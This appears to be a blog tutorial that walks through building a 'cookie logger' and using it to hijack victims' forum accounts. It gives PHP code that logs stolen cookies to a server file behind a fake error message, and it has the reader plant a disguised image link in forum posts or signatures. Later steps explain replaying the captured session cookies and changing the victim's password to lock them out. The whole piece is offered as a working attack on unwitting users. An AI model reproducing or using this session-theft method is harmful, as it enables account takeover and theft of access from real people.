What is cookie logger ?
In my previous post i explained How To Hack Yahoo Account Using Cookie Stealing To Browser.
Today i will explained how to make your own cookie logger and hack victims account. A Cookie Logger is a Script that is Used to Steal anybody’s Cookies and
stores it into a Log File from where you can read the Cookies of the
Victim.
How to make your own Cookie Logger…Hope you will enjoy Reading it …
Step 1: Save the notepad file from the link below and Rename it as Fun.gif
Click To Download Script here
Step 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php:
$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “rn” . $_GET["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
?>
Step 3: Create a new Notepad File and Save it as logfile.txt
Step 4: Upload this file to your server
cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/fun.gif
If you don’t have any Website then you can use the following Website to get a Free Website which has php support :
Step 5: Go to the victim forum and insert this code in the signature or a post :
Click to download here
Step
6: When the victim see the post he view the image u uploaded but when
he click the image he has a Temporary Error and you will get his cookie
in log.txt . The Cookie Would Look as Follows:
phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D;
phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9
Step
7: To get the access to the Victim’s Account you need to replace your
cookies with the Victim’s Cookie. You can use a Cookie Editor for this.
The string before “=” is the name of the cookie and the string after “=”
is its value. So Change the values of the cookies in the cookie Editor.
Step
8: Goto the Website whose Account you have just hacked and You will
find that you are logged in as the Victim and now you can change the
victim’s account information.
Note
: Make Sure that from Step 6 to 8 the Victim should be Online because
you are actually Hijacking the Victim’s Session So if the Victim clicks
on Logout you will also Logout automatically but once you have changed
the password then you can again login with the new password and the
victim would not be able to login.
0 comments:
Post a Comment